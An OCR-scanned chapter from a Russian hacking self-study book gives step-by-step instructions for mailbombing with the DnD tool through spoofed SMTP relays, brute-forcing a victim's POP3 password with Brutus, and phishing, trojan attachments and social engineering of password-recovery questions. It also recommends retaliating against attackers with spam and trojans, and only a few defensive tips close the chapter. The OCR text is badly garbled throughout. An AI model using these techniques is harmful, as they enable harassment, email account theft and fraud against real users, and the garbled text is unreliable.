Деструкция почтового клиентаВ этой главе мы опишем крайние разрушительные действия хакеров, направлен-ные на развал всей системы электронной почты любыми методами, включаявзлом паролей доступа к почтовым ящикам, мейлбомбинг, мошеннические прие-мы раскрытия паролей доступа к почтовым ящикам и запуска троянских коней накомпьютере ламера, попавшегося на крючок толковому «кул хацкеру».

Все описываемые далее методы хакинга требуют от хакератщательного скрытия своего местопребывания и вообще любыхсведений, могущих навести на его след разнообразных блюсти-телей порядка в киберпространстве. Если вы захотите попробо-вать на практике все описанные далее приемы хакинга, настоя-тельно рекомендуем ограничиться экспериментальной интрасе-тью, и никогда никому не рассказывать о своих занятиях. Если жевы захотите попробовать свои силы в Интернете, то учтите,что этим самым вы переступаете за некую красную черту, послечего может наступить все, что угодно, за что автор не несетникакой ответственности и вообще не советует… Короче, ду-майте сами — вас предупредили!

Мейлбомберы и мейлбомбинг — это одна из самых излюбленных забав лично-стей наподобие доктора Добрянского (да, да, того самого, из Главы 1, с лысымобугленным черепом и хаотической походкой). В самом деле, ну что может бытьзабавнее, чем завалить всяким бессмысленным хламом почтовый ящик вашегонедруга или просто первой попавшейся личности, встретившейся на прогулке вкиберпространстве! Пусть потом этот бедолага разгребает полученный мусор, даеще и объясняется с системным администратором почтового сервера. Хотя за-чем заниматься рассылкой писем? Ведь можно сделать еще проще — подписатьсвою жертву на рассылку кухонных рецептов или спортивных новостей — и пустьвсю работу возьмут на себя владельцы сайтов — распространителей подписки.

Все такие послания называются флудом (от английского слова Flood — заливка,затопление) или спамом (от английского слова Spam — колбасный фарш, консер-вы. Причина применения слова Spam в компьютерной технологии остается за-гадкой). Чтобы «зафлудить» чужое «мыло» (т.е. забить мусором электронныйпочтовый ящик своего недруга), существует множество программ, причем весь-ма высокоразвитых, позволяющих без всяких проблем переслать кучу случайносгенерированных сообщений по указанному адресу. Флудеры к тому же умеютскрывать реальный почтовый адрес отправителя, используя для этого прокси-

Page 86: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

серверы и анонимные SMTP-ретрансляторы. Мы опишем работу такого мейл-бомбера на примере программы со страшным названием Death & DestructionEmail Bomber (Смертельный & Всесокрушающий мейлбомбер) версии 4.0,сокращенно называемой DnD (http://www.softseek.com/Utilities/VBRUN_Files/).

Читатели могут без труда найти в Интернете множество дру-гих мейлбомберов, выполнив поиск по строке запроса «мейлбом-бер». Функциональные возможности мейлбомберов могут раз-ниться по числу предоставляемых инструментов, и мы выбралиDnD, посчитав его наиболее высокоразвитым программным сред-ством. В дополнение к нему особенно рекомендуем познакомиться смейлбомбером Avalanche — по возможностям Avalanche не уступаетмейлбомберу DnD, а кое в чем и превосходит его.

На Рис. 6.1 представлено рабочее окно мейлбомбера DnD 4.O.

Death and Desliuclion 4.0

File Clones Header» Session Random Lists Mailing Lilts Window Extras Help

м-ш

тттSend bomb to:

Say bomb is from: I

CC:_pj

|7| 0 Randomly Change | EdilL

Message Subject: I

Message Body:

] 0 Randomly Change | Edit List

| SMTP Spy

jendjombjl | Edil Headers | | Abort | | Clear | | Clone | fy

Email Bombing is rarely damagingto the target but is alwaysdamaging to smtp hosts. I do NOTcondone mailbombing as itcauses problems for SysAdmins ofservers. I did not make thisprogram for people to blast awayat each other. PLEASE use itresponsibly, and if you HAVE toemail bomb, then please use theoption to randomly switch serversin between messages; as itlightens the loads on the server.Have fun and don’t ruin a goodsysadmins time by flooding hisserver!

i-Size of Bomb-IB И Randomly Change [ — ,Usages to send:-m— I Edit Server list

J I 1 I O Never ending bomb

20.01.2003». use the Edit He»

Puc. 6.1. Набор инструментов DnD весьма обширен

Чтобы разобраться в возможностях программы DnD, давайте для пробы «зафлу-дим мыло» нашего ламера Коли, работающего на компьютере А1ех-1. Для этогомы вначале перешлем Коле десяток посланий со случайно сгенерированным со-держимым, постаравшись сохранить свою анонимность (на всякий случай).Выполнение такой атаки требует специальной настройки параметров мейлбом-бера и подготовки почтовой бомбы.

Рассмотрим эти задачи по порядку.

84

Page 87: Самоучитель хакера подробное иилюстрированное руководство

Деструкция почтового клиента

СнаряжениеДля настройки DnD используется группа элементов управления Settings(Настройка), расположенная внизу рабочего окна программы DnD (см. Рис. 6.1).Для настройки DnD в группе элементов управления Settings (Настройка) следуетустановить следующие параметры:

> В поле с открывающимся списком SMTP Host (Хост SMTP) выберите из спи-ска, либо введите сами адрес ретранслирующего SMTP-сервера, который бу-дет использоваться для рассылки спама. Мы будем использовать свой SMTP-сервер Sword-2000.sword.net.

> В открывающемся списке Spoof Host (Поддельный хост) укажите названиенесуществующего хоста, которое будет отсылаться на атакуемый компьютер.Это название должно состоять из одного слова, которое также можно вы-брать из открывающегося списка.

Флажок Randomly Change (Случай-ная замена) позволяет задать режим,при котором каждое письмо будетпересылаться через случайно вы-бранный SMTP-сервер.

> Если необходимо отредактироватьсписок SMTP-серверов, щелкнитена кнопке Edit Server List (Редак-

• Random Servei List

orca.esdIH.w | |mw.highway1.c| |intetconnect.ne| lhorizQns.net

stjohns.edu ] Imalasada.lava. | lpressentef.com | |cyberhighway.n|

mail.sisna.com| | why.net |widQwmaker.co| Iclubmet.mettob |

wwa.com J |nyx1G.cs.du.ed| | clinet.fi j jcabletegina.co |

soi.hypeichalcl rdagobert.rz.uni-jl lspace.net J |maple.nis.net |

tka.com | Iplix.conr Idubmet.metrob | ltMvl.net

ihZOOO.nel | vitro, com

Puc. 6.2. Диалог для правки спискаретранслирующих SMTP-серверов

тировать список серверов). На эк-ране появится диалог RandomServer List (Список случайных сер-веров), представленный на Рис. 6.2.

Для коррекции списка SMTP-серверов щелкните на нужном поле в диалогеRandom Server List (Список случайных серверов) и отредактируйте его.Для сохранения изменений щелкните на кнопке Submit (Утвердить).

В группе переключателей Size of Bomb (Размер бомбы) (Рис. 6.1) установитеодин из переключателей для выбора числа передаваемых писем:

• Выбор # of messages to send (Число сообщений для отправки) позволяетв соседнем справа поле задать число передаваемых сообщений. В нашемслучае задайте 10.

• Выбор Never ending bomb (Бесконечное число бомб) приводит к нескон-чаемой передаче сообщений.

85

Page 88: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Check the box and then fill in the information that will appear in theheaders under that category; or uncheck the box to remove it fromthe headers.

П X-Mailer: |

П X-URL: |

П X-Sender: |

П X-Date: |

Q Return Path: [

Q References: |

П Priority: I

Q X-Authenlication Warning

| Generate IP | |124.49.153.SO | [TedGilsdorf

Ok Clear Cancel

Puc. 6.5. Ввод заголовков MIME также поможет замести следы

АН13ка клоновКроме описанных возможностей, в программе DnD имеется несколько дополни-тельных средств, помогающих в рассылке спама своим жертвам. Среди важней-ших средств досадить своему недругу упомянем возможность рассылки клонов -почтовых бомб, посылаемых одновременно по одному или нескольким адресам,с использованием одинаковых настроек мейлбомбера.

Чтобы запустить клона, можно щелкнуть на кнопке Clone (Клон) в диалогеE-Mail bomb (Почтовая бомба) и отобразить диалог Bomber Spawn 1 (Генераторбомб), представленный на Рис. 6.6.

-a Bomber Spawn 1 ЯШЁГ

Sendbombto:

Say bomb is from:

Message Subject:

Message Body:

SMTP Server:

Г-1 №l 1ГЛ ЕЭ Randomly Change

| | Random |

1

ГП gl Randomly Change

ya

ll§nll°ml| I Edit Headers | | Abort || Clear £j?

[Status I

{Messages Sent! |0 |

Puc. 6.6. Диалог создания клонов

88

Page 89: Самоучитель хакера подробное иилюстрированное руководство

Деструкция почтового клиента

Как видим, диалог Bomber Spawn 1 (Генератор бомб) создания и рассылки кло-на практически совпадает с диалогом E-Mail bomb (Почтовая бомба) и служитдля той же цели — создания почтовой бомбы и рассылки ее по указанному адресучерез ретранслирующие SMTP-серверы. Преимущество рассылки клонов состо-ит в возможности параллельной отправки множества писем, идущих к адресатучерез множество SMTP-серверов. Теперь-то этому ламеру Коле не устоять — по-лучив сотни писем со всех сторон света, он не захочет и близко подходить к за-битому епамом почтовому ящику! Ведь от такой атаки не спасут даже средствафильтрации электронной почты — множество использованных адресов источни-ков весьма затруднит решение такой задачи.

Если же вы хотите совсем уж добить Колю, можно создать множество клонов -столько, сколько потянет обработать ваш компьютер и линия связи (не увлекай-тесь — их ресурсы вовсе не беспредельны).

>• Чтобы создать множество клонов, в главном окне мейлбомбера DnD выбе-рите команду меню Clones » Load Multi Clones (Клоны * Загрузить мно-жество клонов). На экране появится диалог Number of clones (Количествоклонов), представленный на Рис. 6.7

Number of clones

How many clones do you want to load?

L J

Puc. 6.7. При задании числа клоновбудьте благоразумны — компьютер не резиновый!

> В диалоге Number of clones (Количество клонов) укажите число клонов (оп-тимально 5-6) и щелкните на кнопке ОК.

В главном окне отобразится указанное число диалогов Bomber Spawn №(Генератор бомб), пронумерованных от 1 до № — в зависимости от указанногоколичества клонов. Настройте параметры клонов аналогично настройке почто-вой бомбы и щелчками на кнопке Send Bomb (Послать бомбу) направьте этуармаду клонов по адресу ламера Коли. Можно с уверенностью сказать — такаяатака клонов ему будет не по вкусу!

Ко&ро&ое бомбометание списками рассылкиНо и это еще не все! Ведь существует такая прекрасная вещь, как списки рас-сылки — включив в них свою жертву, можно с уверенностью предречь целую

89

Page 90: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

кучу неприятностей владельцу почтового ящика! И программа DnD предлагаетдля этого целый набор списков рассылки, который можно открыть, выбрав ко-манду меню Mailing lists (Списки рассылки). Отобразившийся диалог Subscribejoe lamer to mailing list (Подписка ламера на список рассылки), представленныйна Рис. 6.8, предложит вам подписать своего врага на такие интересные вещи,как Euro Queer (Европейское чудо), Mormons (Мормоны), Family Medicine(Семейная медицина) и так далее и тому подобное — в списке найдется подпискана любые вкусы!

*i Subscribe joe lamei to a mailing list! Я1=Ш1Subscribe your enemy to a mailing list • even worse then a mailbomb!More lists coming next version..sorry lor the small quantity (his lime.My apologies for the bad usability but I will use checkboxes instead of option boxesnext version..

©Jewish List О CMd Parenting Targets email address: [

О Digital Queers О Gay Quakers Targets fits! name: |j0hn

О Mormons О Christianity Targets last name: |роп

О Gay/Lesbian О womanism О Lesbians over 40 О Bi Australians

О Euro Queer О ВЫ people О Family Medecine О Allergies

Puc. 6.8. Списки рассылки программы DnD могут удовлетворить любые вкусы

Недаром разработчик программы DnD считает подписку на список рассылкиоружием пострашнее мейлбомбинга. Введите адрес своего врага в поле TargetEmail Address (Адрес назначения), и щелкните на кнопке Subscribe em(Подписать) — все остальное программа сделает сама. И ваш недруг очень уди-вится, когда к нему будут поступать назойливые сообщения со всякими сомни-тельными советами и предложениями.

Дополнительные вооруженияКроме рассылки почтовых бомб и клонов, а также подписки жертв на спискирассылки, мейлбомбер DnD оснащен дополнительными вооружениями, однако,как признается автор программы, их работа плохо тестирована. Среди этих ин-струментов выделим утилиту генерирования паролей, запускаемую командойменю Extras » Pword generator (Дополнение * Генератор паролей). При этомоткрывается диалог Randomic Password Generator (Генератор случайных па-ролей), представленный на Рис. 6.9.

Чтобы сгенерировать пароль, следует в поле How many characters? (Сколькосимволов?) указать его длину (стандартные требования — не менее 8 символов) ис помощью переключателей выбрать: Use Both (Использовать оба) — использо-вание в пароле и буквы и цифры, Use numbers (Использовать цифры) — исполь-

90

Page 91: Самоучитель хакера подробное иилюстрированное руководство

Деструкция почтового клиента

•*В Randomic Passwoid Geneialor тттJusl click to generate a random password. Choose how longyou want it to be by the number ol characters.

How many characters? [12 |

© Use Both О Use numbers О Use letters

6i2i9e1m5p8i

Close Clear box

зование в пароле только цифры или Useletters (Использовать буквы) — исполь-зование в пароле только буквы. Про-грамма-генератор на первый взгляд ра-ботает неплохо, однако буквы генери-руются только в нижнем регистре, чтоослабляет криптостойкость созданныхпаролей.

В меню Extras (Дополнение) имеются и

другие инструменты — удаленного Рис. 6.9. Генерация случайных паролейуправления SMTP-хостом (пункт менюSMTP Remote (Удаленное управление SMTP)), подключения к портам сетевыхкомпьютеров (пункт меню Raw Port (Вскрытый порт)). Все эти средства оченьполезны для взлома почтовых серверов, но требуют знания почтовых прото-колов (в частности, команд SMTP). А щелчок на пункте меню Other Tools(Другие инструменты) открывает диалог с целым набором инструментов сетево-го хакинга. Однако мы не будем здесь рассматривать эти инструменты — это во-прос, обсуждаемый в следующих главах, где будут описаны более совершенныеинструменты сетевого хакинга.

Итак, мы решили первую задачу — «зафлудили мыло» своего недруга; теперьсамое время подумать о более рациональной трате своих сил. В самом деле, нупогорюет ламер Коля о потере своего почтового ящика, так ведь и новый от-крыть недолго. Более содержательная атака состоит во взломе доступа к почто-вому ящику своего недруга, что даст хакеру воистину безграничные возможно-сти по доведению ламера до кондиции (зависящей от криминальных наклонно-стей хакера). Итак, рассмотрим хакерские технологии взлома почтовых ящиков.

паролей к почтовому яшикуСамая простая технология состоит в подборе паролей к почтовому ящику своегонедруга путем простого перебора всех вариантов логинов и паролей для входнойрегистрации. Программы, реализующие такую технологию, действуют оченьпросто — они подсоединяются к почтовому серверу по протоколу РОРЗ (илиIMAP) и посылают ему запросы на авторизацию, изменяя логины и пароли. Еслипопытка регистрации удалась — почтовый ящик взломан.

Примером программы такого рода является Brutus Authentication Engine Test 2(Машина Brutas для аутентификационного тестирования, версия 2), сокращенноBrutus AET2 (http://www.hobie.net/brutus). На Рис. 6.10 представлен главныйдиалог программы Brutus, содержащий все необходимые инструменты взломапаролей доступа к почтовому серверу РОРЗ, серверу FTP, HTTP, Telnet и дажетроянскому коню NetBus.

91

Page 92: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

»1

1I Biulus • AET2 — www.hoobie.net/biutu: — (January 2000) (SisJE

lie Tools Help

Target |127.0.0.1 | Ti»pe|POP3 |~| | Start | Stop [Clear

Port (110 | Connections ИЩШИИИНМ 10 Timeout ФЩ^Щ} 10 П Use Proxy | Drf»» |

|B’?S..?®. .P.9.?.l| D Try to stay connected for [Unlimite || attempts

. . .

0 Use Username П Single Usef Pass Mode [Word List «p|

User File | users.txt | | Browse | pass pje jwords.txt | | Browse |

Positive Authentication Results

Target I Type I Username I Password I

5J | ТЫюи) R«*cl AuthSeq Throttle Quick Ki

II II ll>dle

I

*Puc. 6.10. Главный диалог программы Brutus весьма содержателен

В этой главе мы рассмотрим средства взлома почтового сервера РОРЗ, оставив встороне другие средства программы Brutus (в главе 8 мы опишем применениеBrutus для взлома доступа к серверу IIS). В качестве жертвы мы изберем опять-таки ламера Колю, хранящего свою почту по адресу alex-1 .sword.net, с учетнойзаписью kolia. На первый раз ограничимся взломом только пароля, считая, чтологин нам известен — его можно добыть многими другими способами, о которыхмы поговорим чуть позже.

Для взлома почтового ящика ламера Коли выполним такие шаги.

>• В диалоге Brutus — АЕ2 (Рис. 6.10) в поле Target (Цель) укажите адрес поч-тового сервера РОРЗ, в данном случае alex-1.sword.net.

>• В открывающемся списке Туре (Тип) выберите тип взламываемого сервера,в данном случае РОРЗ.

>• В группе элементов управления Connection Options (Параметры подключе-ния) не забудьте установить флажок Use Proxy (Использовать прокси), есливы работаете с реальным почтовым ящиком — это позволит вам сохранитьанонимность.

>• В группе элементов управления Authentication Options (Параметры автори-зации) установите флажок Single User (Единственный пользователь) — теперьпрограмма будет искать пароль для одного пользователя.

92

Page 93: Самоучитель хакера подробное иилюстрированное руководство

Деструкция почтового клиента

х В поле User file (Файл пользователя) ведите логин для взламываемого почто-вого ящика, т.е. имя учетной записи Коли — kolia.

>• В открывающемся списке Pass Mode (Способ взлома) выберите Brute Force(Прямой перебор). Диалог программы Brutus примет вид, представленный наРис. 6.11.

X Biutus — АЕТ2 — www.hoobie.net/biuluit — (January 2000J

File Tool. Help

тшт

Target |alex-1.sword.net

Pnnection Optioru

>orl [110 | Connections

Type|POP3 [T| | Start | Slop | Clear |

I 10 Timeout I 10 П Use Proxy I Define!

IPS Options-

| Modify sequence | П Try to slay connected for |Untmil8 |-r | attempts

-Authentication Options

0 UseUsemame 0 Single User

UserlD | kolia

Pass Mode [Brute Force|—1 |[Kange|| | Dfellfcuted |

Positive Authentication Results

Target I Type I Username | Password |

R«t»et AuthStq Throttle Quick Kil

Puc. 6.11. Настройка программы Brutus для взлома сервера POPS

Обратите внимание на появившуюся после выбора способа взлома кнопку Range(Диапазон). Щелчок на копке Range (Диапазон) открывает диалог Brutus — BruteForce Generation (Brutus — Генерирование паролей прямым перебором), пред-ставленный на Рис. 6.12.

Biutus — Biule Foice Generation

© Digits only

О Lowercase Alpha

О Uppercase Alpha

О Mixed Alpha

О Alphanumeric

О Full Keyspace

Min Length [

Max Length [4 [T

Cancel

О Custom Range |etaoinsrhldcumfpgwybvkxjqzl 234567890! |

Puc. 6.12. Диалог выбора символов и длины взламываемого пароля

93

Page 94: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

В диалоге Brutus — Brute Force Generation (Brutus — Генерирование паролейпрямым перебором) делается основной выбор — следует оценить, какой длиныможет быть пароль у Коли, и какие символы он может применить. Учитывая,что Коля — неопытный пользователь, мы выберем в поле Min Length (Минималь-ная длина) число 3, а в поле Max Length (Максимальная длина) — число 4. Приме-няемые символы мы ограничим цифрами, установив переключатель Digits only(Только цифры).

Теперь все готово для атаки.

> Щелкните на кнопке Start (Старт) в диалоге Brutus — АЕ2 и наблюдайте засообщениями и линейным индикатором внизу диалога Brutus — АЕ2. Резуль-тат представлен на Рис. 6.13.

X Uiutus — АЕТ2 — www.hoobie.net/biutus — [Januaiy 2000J

File Took Help

В 1=1 ЕЭ

Target | alex-1.sword.net Type|POP3 EJ | Start | Stop | Clear |

i-Connection Option*

Port [110 | ConnectionsI

10 Timeout 10

rPOl

I ?

P3 Options-

| Modify sequence | D Try to stay connected for |Unlimite | •> | attempts

-Authentication Options

El Use Username 0 Single User

UserlD [kolia

Pass Mode [Brute Force [ I Range DisllbAed

Positive Authentication Results

Target I Type | Usernamealex-1.sword.net POP3 kolia

I Password I0007

Positive authentication at alex-1 .sword.net with User : kolia Password : 0007 (1 0997 attempts

10997 Uikolia P:0000

Timeout Reject

~]|37 Attempts per second |

Throttle Quick И

Idle

Puc. 6.13. Пароль почтового ящика номера Копи взломан1.

Из записи в поле Positive Authentication Results (Положительные результатыаутентификации) видно, что пароль учетной записи kolia найден — 0007. Там жеможно увидеть, что в процессе взлома программа Brutus выполнила 10997 попы-ток регистрации на почтовом сервере alex-1.sword.net (всего их число равно11000). На это было потрачено почти 5 минут работы компьютера Pentium 3 счастотой процессора 1000 МГц, связанного с почтовым сервером через сетьEthernet с пропускной способностью 10 Мбит/сек.

Теперь можно трезво оценить, чего стоят средства взлома паролей почтовыхящиков методом подбора паролей, подобные программе Brutus (а их достаточно

94

Page 95: Самоучитель хакера подробное иилюстрированное руководство

Деструкция почтового клиента

много). Во-первых, не все пользователи такие ламеры, как Коля, и поэтому вы-бирают пароли достаточной длины (минимум 8 символов!), используя при этомбуквы, цифры и спецсимволы клавиатуры (например, л&$ и т.д.). Взлом такихпаролей потребует неимоверных ресурсов! Для практики попробуйте в диалогеBrutus — Brute Force Generation (Brutus — Генерирование паролей прямым пе-ребором) выбрать длину пароля 8 символов, а переключатель выбора символовустановите в позицию Full Keyspace (Вся клавиатура). Щелчок на кнопке Start(Старт) отобразит в диалоге Brutus — АЕ2 фантастическое число всех вариантовпоиска — 6 095 689 385 410 816 — непонятно даже, как его написать словами!А если выбрать 12 символов?

Несколько лучше выглядит перспектива словарной атаки, когда при поиске па-ролей используется словарь, в частности, наиболее часто употребляемых слов(см., например, перечень в [10]). Эти средства также представлены в Brutus, идля их использования следует выбрать режим атаки со словарем в поле PassMode (Способ взлома). Однако учитывая количество слов в английском языке(около 100 000), да еще и наличие в нем склонений и спряжений, такие атакитакже не вызывают энтузиазма. Ну разве что можно попробовать сотню-другую излюбленных ламерами паролей, типа password, parol, MyPasswordи так далее — на хакерских Web-сайтах и компакт-дисках часто можно найтисловари подобного рода.

Во-вторых, все такие попытки аутентификации чаще всего выполняются черезудаленное соединение, пропускная способность которого на несколько порядковниже, чем у соединения через Ethernet, и не превышает 30-50 Кбит/сек (и этоеще хорошо). Есть и третье соображение — следует учесть возможности системызащиты почтового сервера. Вряд ли нынче существует хоть где-либо почтовыйсервер, не ограничивающий число попыток входной регистрации — такие сер-веры нынче просто не выжили бы, как динозавры или мамонты, под напором«кул хацкеров», преисполненных желания вломиться на чужую территорию ивсе там сокрушить.

Все это заставляет задуматься о практической применимости средств для взломапочтовых ящиков путем простого перебора логинов и паролей входной аутен-тификации. Учитывая наш эксперимент, можно заключить, что хакерам не оста-ется ничего другого, как искать дыры в системе защиты почтовых серверов,прибегать к мошенническим уловкам и уповать на глупых системных админист-раторов, не поддерживающих железный порядок в проведении политики безо-пасности для компьютерной системы организации. Первым пунктом этой поли-тики должно быть правило использования сложных паролей достаточной длины.Второе правило должно требовать неукоснительной замены паролей не режераза в месяц — иначе и в самом деле возникает риск взлома, хотя бы через ло-кальную сеть организации.

95

Page 96: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

Насчет дыр в системе защиты серверов IIS и использовании для их взлома про-граммы Brutus мы еще поговорим в Главе 8 этой книги, а здесь нам осталось об-судить одну интересную тему — методы социальной инженерии. Проще говоря,это мошенничество и прочие уловки, к которым прибегают наиболее изобрета-тельные хакеры для взлома почтовых серверов. Эти методы для практиков пред-ставляют наибольший интерес, поскольку, как мы убедились, прямой взломпочтового сервера — дело почти безнадежное, а вот обходные пути — это еще каксказать! Ведь недаром поется в одной песенке: «Нормальные герои всегда идут вобход!». Так что приступим к обходным маневрам.

Методы социальной инженерииСамый простой и надежный метод получения пароля доступа к почтовому сер-веру, а также и вообще к любому сервису Интернета, состоит в рассылке мо-шеннических писем, имеющих целью вынудить ламера самому сообщить свойпароль. В Главе 1, в самом начале, приведено одно такое письмо, якобы от про-вайдера Интернета, приглашающее получателя указать «новый» пароль для за-щиты своего доступа к серверу Интернета. Это — неприкрытое мошенничество,поскольку системные администраторы, что бы там о них не писалось в различ-ных хакерских изданиях, никогда не опускаются до такой глупости, как запрос упользователей их паролей по электронной почте. Тем не менее, такой приемсрабатывает — ведь нынче к освоению Интернета ежедневно приступает множе-ство доверчивых новичков (все мы когда-то были новичками), так что шансы науспех неплохие.

Другой, более технически продвинутый метод — рассылка писем с вложениями,содержащими злонамеренный программный код. В предыдущей главе мы рас-смотрели несколько таких атак на компьютер ламера Коли. Как вы помните, врезультате атаки TFTP на компьютер А1ех-1 было записан и запущен код в ак-тивном вложении электронного письма, после чего компьютер А1ех-1 превра-тился в сетевого раба хакера Пети. Надо сказать, что хотя описанная атака TFTPвесьма эффектна, ее вряд ли можно назвать эффективной. Ведь если компьютерпозволил открыть неаутентифицированный сеанс связи по протоколу TFTP длязаписи файлов на диск компьютера, то его система защиты настолько слаба, чтодля взлома можно попробовать другой метод, попроще и понадежнее. Количест-во компьютеров, подсоединенных к Интернету вообще без всякой защиты, воис-тину безмерно, и с точки зрения хакера, бродящего по киберпространству впоисках поживы, такой компьютер напоминает виртуальный дом с открытыминастежь дверями и окнами.

Рассылка писем с вложениями представляет собой наилучший способ внедрениятроянов. Применяемая при этом техника обмана пользователей весьма проста -разослав кучу писем с вложенной программой инсталляции трояна, хакер ждет,

96

Page 97: Самоучитель хакера подробное иилюстрированное руководство

Деструкция почтового клиента

когда доверчивый получатель письма щелкнет на кнопке (или ссылке) для от-крытия вложения. Чтобы привлечь внимание, это вложение рекламируется вписьме как, допустим, «бесплатное» обновление Web-браузера или «пакет биз-нес-программ» и т.п. (и это только часть того, что доводилось находить в своемпочтовом ящике). Щелчок для открытия вложения запускает программу инстал-ляции. На компьютере-жертве устанавливается, например, троян, который со-общает хозяину о своем успешном внедрении по конкретному ГР-адресу.

Все остальное очень просто. Если внедренный троян — «ленивый», т.е. работаеткак обычный кейлоггер, он будет постепенно передавать всю информацию оваших действиях своему хозяину — и, в числе прочего, передаст все введенныевами пароли. Если же троян «активный», т.е. поддерживает средства удаленногоуправления, он позволит своему хакеру подключаться к компьютеру-жертве иделать на нем что угодно — фактически стать владельцем всех информационныхресурсов компьютера. Вот недавно, в конце 2002 г., в Москве накрыли одну та-кую компанию «кул хацкеров», занятых рассылкой троянов, которые выведывалипароли доступа к провайдерам Интернета у незадачливых получателей писем.Потом эти пароли продавались прямо с Web-странички. Потом за этими «хацке-рами» пришли. Потом их посадили. Так что думайте…

Вот еще один эффективный метод обхода защиты почтовых сервисов (и нетолько их). На Web-страничках, предоставляющих сервис электронной почты,очень часто можно встретить строку типа Забыли пароль?, позволяющую вос-становить забытый пароль доступа. Щелчок на этой строке предлагает ввестиответ на вопрос, который вы выбрали при регистрации на почтовом сервере -например, Ваше любимое блюдо?, Девичья фамилия матери?, Как зовутВашу собачку? и так далее. Такой способ восстановления доступа к почте — этонастоящий Клондайк для понимающего человека, поскольку число блюд, имен ифамилий не так уж и велико и, к тому же, их можно выведать у самого хозяинапочтового ящика. Для этого можно, скажем, написать ламеру письмо и пригла-сить его на свой любимый чат, а там, завоевав доверие, выведать у него все этисведения. Скажем, если в непринужденной виртуальной беседе узнать у ламераКоли, что его любимое блюдо — пареная репа, то можно попытаться проникнутьв его почтовый ящик, указав в ответ на запрос о любимом блюде строку типагера или repa_parenaia, ну и так далее — побольше фантазии!

ЗаключениеОписываемые в главе методы не без основания кое-где называются террористи-ческими. Поэтому хакер, прежде чем приступить к их использованию, дол-жен отчетливо понимать свои перспективы, могущие появится на горизонтепри неосторожном обращении с такими разрушительными орудиями, какмейлбомберы и взломщики паролей почтовых серверов. Основное предна-

974 — 5830

Page 98: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

значение таких приспособлений — хулиганство, шантаж, вандализм, дискреди-тация своей жертвы путем опубликования личной переписки и так далее и томуподобное — что ни деяние, то статья уголовного кодекса. Так что всем желаю-щим испытать эти инструменты на практике автор настоятельно советует огра-ничиться экспериментальной интрасетью.

Антихакер должен знать эти инструменты не хуже хакера, поскольку с их по-мощью можно решить кое-какие задачи активной обороны. Став объектомспэмминга или подвергнувшись атаке взлома пароля почтового ящика, можнопопробовать вычислить почтовый адрес своего обидчика и ответить ему той жемонетой. К примеру, можно забросать его спамом (вернуть обратно полученноеписьмо десять раз) или поместить в свой почтовый ящик письмецо с трояном -глядишь, и подловишь зазевавшегося «кул хацкера» на горячем — нечего лазитьпо чужим ящикам!

К мерам пассивной обороны следует отнести такие меры.

• Используйте сложные пароли доступа к почтовому серверу, длиной не менее8 (лучше 12) символов, включающих буквы, цифры и спецсимволы. Лучшевсего использовать генераторы случайных паролей, подобные предлагаемомув DnD инструменту.

• Заменяйте пароли доступа к почтовому серверу не реже одного раза в месяц.

• Обязательно обзаведитесь антивирусной программой, поддерживающей кон-троль почтовых вложений на наличие вирусов — например, Norton Antivirusили MacAfee VirusScan.

• Чтобы исключить раскрытие конфиденциальности переписки, пользуйтесьшифрованием — для этого идеально подходит программа PGP Desktop Security.

• Для защиты от спама следует настроить почтовые фильтры, не пропускаю-щие письма с определенными адресами отправителей.

• Наконец, универсальный совет — не будьте ламером, не доверяйте никому, неоткрывайте никакие вложения, полученные неведомо откуда неведомо от кого.Про передачу паролей и прочих закрытых данных по почте в открытом видезабудьте навсегда — а если требуется переслать хоть сколько-нибудь конфи-денциальные данные, применяйте надежное шифрование.

98

Page 99: Самоучитель хакера подробное иилюстрированное руководство

Г Л А В А 7 .

Хакинг ICQАббревиатура ICQ означает «Intelligent Call Query», что переводится приблизи-тельно как «Интеллектуальный вызов на связь». А еще произношение сокращенияICQ [Ай-Си-Кью] созвучно фразе: «I Seek You» — «Я ищу тебя»; кроме этого, нарусском языке программу ICQ часто называют просто «аськой». Название ICQбыло присвоено службе Интернета, впервые разработанной и предложенной навсеобщее употребление в 1998 году компанией Mirabilis, позже продавшей(за 40 миллионов долларов) свое детище компании AOL.

Служба ICQ известна всем любителям путешествий в Интернете, для которыхICQ играет роль виртуального пейджера, позволяя связываться со всеми своимидрузьями, которые в данный момент находятся в онлайновом режиме. Путешест-венник по виртуальным просторам Интернета более не остается в одиночестве -везде, где бы он ни был, к нему могут обратиться любые пользователи ICQ, и онсам может связаться с любым другим путником, сидящим за компьютером влюбой части света. А связавшись друг с другом, можно обменяться сообщения-ми, переслать друг другу файлы и даже поговорить почти как по телефону — по-слав голосовое сообщение.

Для работы сервиса ICQ используется сервер, через который происходит поисконлайновых собеседников и авторизация клиентов ICQ. Программы клиентовICQ можно найти на сайтах, поддерживающих работу ICQ, например,http://www.ICQ.com, http://mira-bilis.com. Самый известный клиент ICQ так и на-зывается — ICQ с добавлением года создания и версии, например, 1998,1999, 2000,2002, ныне существует версия ICQ 2003. Для подключения к серверу ICQ клиентиспользует порт UDP, номер 4000, а для передачи и приема сообщений — портTCP, выделяемый во время сеанса связи.

Каждому клиенту, подключившемуся к сервису ICQ, предоставляется иденти-фикатор UIN (Unique Identification Number — Уникальный идентификационныйномер). Для вызова на связь аськи собеседника достаточно ввести его UTN — и накомпьютере клиента ICQ замигает значок вызова, раздастся звонок или даже го-лосовое предупреждение о вызове.

Казалось бы, что может быть безобиднее ICQ? Однако в умелых руках сервисICQ стал воистину грозным оружием, перед которым пал не один ламерскийкомпьютер и не один неосторожный пользователь поплатился за длинный язык ипренебрежение мерами защиты. В чем же тут причина, спросите вы? А вот в чем.

Page 100: Самоучитель хакера подробное иилюстрированное руководство

Самоучитель хакера

АгськиныВо-первых, причина особой опасности аськи заключается в предоставлениипользователям больших возможностей по управлению сеансами связи ICQ, и невсе этими возможностями правильно пользуются. Во-вторых, разработчики кли-ентов и серверов ICQ плохо спроектировали и реализовали сервис ICQ с точкизрения безопасности.

Основные угрозы, связанные с сервисом ICQ, таковы:

